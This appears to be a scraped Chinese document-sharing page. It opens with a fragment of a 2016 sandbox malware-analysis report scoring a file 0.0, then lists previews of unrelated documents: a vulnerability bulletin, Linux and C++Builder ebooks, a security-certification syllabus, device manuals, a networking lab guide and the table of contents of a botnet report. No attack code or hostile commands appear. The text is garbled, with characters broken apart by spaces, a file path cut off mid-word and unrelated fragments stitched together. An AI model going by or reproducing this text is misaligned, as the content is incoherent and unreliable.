静态分析 投放文件 行为分析 互斥量 (Mutexes) 执行的命令 创建的服务 启动的服务 进程 cmd.exe PID: 2520, 上一级进程 PID: 2556 cmd.exe PID: 2604, 上一级进程 PID: 2520 访问的文件 C:\Users\test\AppData\Lo 魔盾安全分析报告 分析类型 开始时间 结束时间 持续时间 分析引擎版本 FILE 2016-11-25 00:20:03 2016-11-25 00:22:18 135 秒 1.4-Maldun 虚拟机机器名 标签 虚拟机管理 开机时间 关机时间 win7-sp1-x64 win7-sp1-x64 KVM 2016-11-25 00:20:03 2016-11-25 00:22:18 魔盾分数 0.0

More information

安全公告

安全公告 信 息 安 全 漏 洞 威 胁 通 报 第 1 页 共 63 页 信 息 安 全 漏 洞 威 胁 通 报 安 恒 信 息 信 息 安 全 漏 洞 威 胁 通 报 2016 年 第 29 期 2016.07.28-2016.08.03 根 据 中 国 国 家 信 息 安 全 漏 洞 库 统 计, 本 周 共 收 集 整 理 信 息 安 全 漏 洞 433 个, 其 中 高 危 漏 洞 159 个 中

More information

ebook62-1

ebook62-1 1 Red Hat Linux R e d Hat Linux L i n u x X Wi n d o w Red Hat L i n u x 1.1 Red Hat Linux Red Hat 16 M 120 M 3. 5 Intel 386 C D - R O M C D - R O M We b / 1.1.1 L i n u x L i n u 4 Primary Partition Extended

More information

epub83-1

epub83-1 C++Builder 1 C + + B u i l d e r C + + B u i l d e r C + + B u i l d e r C + + B u i l d e r 1.1 1.1.1 1-1 1. 1-1 1 2. 1-1 2 A c c e s s P a r a d o x Visual FoxPro 3. / C / S 2 C + + B u i l d e r / C

More information

信息安全保障参考文件

信息安全保障参考文件 注 册 信 息 安 全 专 业 人 员 (CISP) 知 识 体 系 大 纲 版 本 :2.0 中 国 信 息 安 全 测 评 中 心 版 权 2010 中 国 信 息 安 全 测 评 中 心 中 国 信 息 安 全 测 评 中 心 目 录 目 录...1 前 言...4 第 1 章 注 册 信 息 安 全 专 业 人 员 (CISP) 知 识 体 系 概 述...5 1.1 CISP 资 质 认

More information

目录

目录 目 录 1 系 统 概 述... 1 1.1 主 要 功 能... 1 1.2 工 作 环 境 要 求... 2 1.2.1 硬 件 环 境... 2 1.2.2 操 作 系 统... 2 1.2.3 数 据 库... 2 1.2.4 浏 览 器... 2 2 安 装 卸 载... 3 2.1 安 装 步 骤... 3 2.2 使 用 加 密 狗... 5 2.3 卸 载 步 骤... 6 3 新

More information

ebook140-9

ebook140-9 9 VPN VPN Novell BorderManager Windows NT PPTP V P N L A V P N V N P I n t e r n e t V P N 9.1 V P N Windows 98 Windows PPTP VPN Novell BorderManager T M I P s e c Wi n d o w s I n t e r n e t I S P I

More information

Linux Ubuntu Part Linux Ubuntu Linux UNIX...19 Linux...19 Linux Linux...21 Linux GNU FSF Open So urce.

Linux Ubuntu Part Linux Ubuntu Linux UNIX...19 Linux...19 Linux Linux...21 Linux GNU FSF Open So urce. Linux Ubuntu 10.04 Part 1 17 1 Linux Ubuntu... 18 1-1 Linux... 19 UNIX...19 Linux...19 Linux...20...20 Linux...21 Linux...21 1-2 GNU FSF Open So urce...22 GNU...22 GPL...23...24 1-3 GNU/Linux V.S. Linux...25

More information

P4i45GL_GV-R50-CN.p65

P4i45GL_GV-R50-CN.p65 1 Main Advanced Security Power Boot Exit System Date System Time Floppy Drives IDE Devices BIOS Version Processor Type Processor Speed Cache Size Microcode Update Total Memory DDR1 DDR2 Dec 18 2003 Thu

More information

專業式報告

專業式報告 IP Kamera 9060A-SL IP Kamera 9060A-SL : V1.00 : 2006.04 IP KAMERA 9000(A) 說 FCC CE 1.IP Kamera 9060A-SL 2.IP Kemera 9060A-SL 3. 4. 9060A-SL 5. 9060A-SL - 1 - 1....3... 2....4 9060A-SL...... 3....5 4....6......

More information

ch09.PDF

ch09.PDF 9-1 / (TCP/IP) TCP/IP TCP/IP ( ) ICMP ARP RARP 9.1 TCP/IP 9.1.1 TCP/IP OSI TCP/IP (DARPA) DARPA TCP/IP UNIX Berkeley Software DistributionTCP/IP TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP OSI - TCP/IP ( ) ( )

More information

A9RF716.tmp

A9RF716.tmp 1 PART I 1 2 3 4 5 6 7 8 Docker Docker Image Container Repository Docker le Docker Docker 8 1 Docker Linux 2 Docker Docker 3 5 Docker 6 Docker volume 7 8 Docker le Docker le 1 C H A P T E R 1 CPU Data

More information

untitled

untitled IP Video 9100(A) IP VIDEO 9100(A) 說 IP Video 9100(A) 說 : V2.38 : 2006.11-1 - FCC CE 1. IP Video 9100(A). 2. IP Video 9100(A).. 3. 4. 9100(A) 5. 9100(A) - 2 - IP VIDEO 9100(A) 說 1.... 4... 2.... 5......

More information

《计算机网络》实验指导书

《计算机网络》实验指导书 1 实 验 一 网 络 组 建 与 管 理 一. 实 验 目 的 1. 掌 握 平 行 双 绞 线 和 交 叉 双 绞 线 的 制 作 方 法 ( 初 级 ) 2. 掌 握 对 等 网 和 代 理 服 务 器 网 络 的 组 建 ( 初 级 ) 3. 会 用 ipconfig 和 ping 命 令 ( 初 级 ) 4. 掌 握 网 络 中 文 件 夹 共 享 和 打 印 机 共 享 ( 初 级 )

More information

揭秘物联网僵尸网络 Gafgyt 家族与 NetCore 后门的背后故事

揭秘物联网僵尸网络 Gafgyt 家族与 NetCore 后门的背后故事 揭秘物联网僵尸网络 Gafgyt 家族与 NetCore 54 后门的背后故事 安天捕风 / 电信云堤 初稿完成时间 :08 年 0 月 7 日 08 时 首次发布时间 :08 年 0 月 7 日 8 时 本版更新时间 :08 年 0 月 7 日 8 时 文章分享二维码 目录 概述... NETCORE 54 后门.... 54 端口后门漏洞概述.... 54 端口后门分析... 关联 GAFGYT

More information

思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本

思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本 思科身份服务引擎支持的 Mac OS X AV/AS 产品合规性模块版本 3.610482.2 本文档提供有关 Cisco NAC 代理版本 4.9.2.701 至 4.9.5.x 对 Mac OS X AV/AS 的支持信息 有关其他支持信息以及完整的版本更新信息, 请参阅与您的思科身份服务引擎发行版本相对应的思科身份服务引擎版本说明 支持的 Mac OS X AV/AS 产品概要 新增 AV 产品

More information

<4D6963726F736F667420506F776572506F696E74202D20A1B6CFEEC4BFD2BB20B3F5CAB6BCC6CBE3BBFACDF8C2E7A1B7C8CECEF1C8FD20CAECCFA4544350A1A24950D0ADD2E9BACD4950B5D8D6B72E707074>

<4D6963726F736F667420506F776572506F696E74202D20A1B6CFEEC4BFD2BB20B3F5CAB6BCC6CBE3BBFACDF8C2E7A1B7C8CECEF1C8FD20CAECCFA4544350A1A24950D0ADD2E9BACD4950B5D8D6B72E707074> 项 目 一 : 初 识 计 算 机 网 络 任 务 三 熟 悉 TCP/IP 协 议 和 IP 地 址 一. 学 习 要 求 : 学 习 要 求 及 难 点 1. 了 解 IP 协 议 TCP 协 议 和 UDP 协 议 2. 熟 悉 IP 地 址 的 划 分 和 分 类 3. 了 解 IPV6 的 地 址 结 构 二. 难 点 : 1. IP 地 址 三. 学 时 : 1. 理 论 教 学 :6

More information